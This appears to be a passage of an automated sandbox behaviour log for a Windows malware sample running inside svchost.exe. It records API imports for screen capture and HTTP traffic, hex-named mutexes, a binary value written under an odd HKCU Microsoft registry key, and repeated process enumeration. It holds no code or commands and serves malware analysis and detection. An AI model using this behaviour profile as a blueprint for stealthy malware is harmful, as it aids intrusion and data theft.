Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76af5708 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsW, address_out = 0x763845bf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsURLW, address_out = 0x763855bf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryEmptyW, address_out = 0x763acd81 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = StrCmpNIW, address_out = 0x76384745 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRenameExtensionW, address_out = 0x763ad32a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = StrStrIW, address_out = 0x763846e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathMatchSpecW, address_out = 0x763886f7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathCombineW, address_out = 0x7638c39c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x76383248 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAddBackslashW, address_out = 0x7638c177 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfW, address_out = 0x763b066c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathUnquoteSpacesW, address_out = 0x76385331 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathSkipRootW, address_out = 0x7639fbf5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindExtensionW, address_out = 0x7638a1b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = SHDeleteValueW, address_out = 0x7637fcca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfA, address_out = 0x7639edfe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryW, address_out = 0x7637ff07 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveBackslashW, address_out = 0x76385c62 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = UrlUnescapeA, address_out = 0x7639c6fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathQuoteSpacesW, address_out = 0x763ace21 True 1
Fn
Module Load module_name = PSAPI.DLL, base_address = 0x75ad0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = GetModuleFileNameExW, address_out = 0x75ad13f0 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75ae0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromString, address_out = 0x75afe599 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeEx, address_out = 0x75b209ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CreateStreamOnHGlobal, address_out = 0x75b0363b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoSetProxyBlanket, address_out = 0x75af5ea5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75b29d0b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x75b286d3 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x76950000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x76965689 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x76964de0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateDCW, address_out = 0x7696e743 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleDC, address_out = 0x769654f4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x76964f70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x76965f49 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = BitBlt, address_out = 0x76965ea6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteDC, address_out = 0x769658b3 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75f20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectA, address_out = 0x75f449e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x75f3b406 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoA, address_out = 0x75f3a33e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetQueryOptionA, address_out = 0x75f31b56 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestA, address_out = 0x75f44c7d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCrackUrlA, address_out = 0x75f2d075 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetSetOptionA, address_out = 0x75f375e8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x75f4f18e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x75f3ab49 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestA, address_out = 0x75fb18f8 True 1
Fn
Module Load module_name = urlmon.dll, base_address = 0x76690000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\urlmon.dll, function = ObtainUserAgentString, address_out = 0x766c1d76 True 1
Fn
Module Load module_name = OLEAUT32.dll, base_address = 0x761b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 9, address_out = 0x761b3eae True 1
Fn
Module Load module_name = Secur32.dll, base_address = 0x75690000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\secur32.dll, function = GetUserNameExW, address_out = 0x7582a415 True 1
Fn
System Get Info type = Operating System True 2
Fn
Module Get Filename process_name = c:\windows\syswow64\svchost.exe, file_name_orig = C:\Windows\SysWOW64\svchost.exe, size = 260 True 1
Fn
Mutex Create mutex_name = 20BC29E135FB9B01285187E3B5593CC8 True 1
Fn
Mutex Create mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY True 1
Fn
Data
Mutex Release mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Mutex Create mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
File Get Info filename = C:\Users\aETAdzjz\AppData\Local\Temp\pyidom, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Local\Temp\usontoi, type = file_attributes False 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY True 1
Fn
Data
Mutex Release mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Thread 0x694
(Host: 3417, Network: 0)
+
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77cb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtQuerySystemInformation, address_out = 0x77ccfda0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
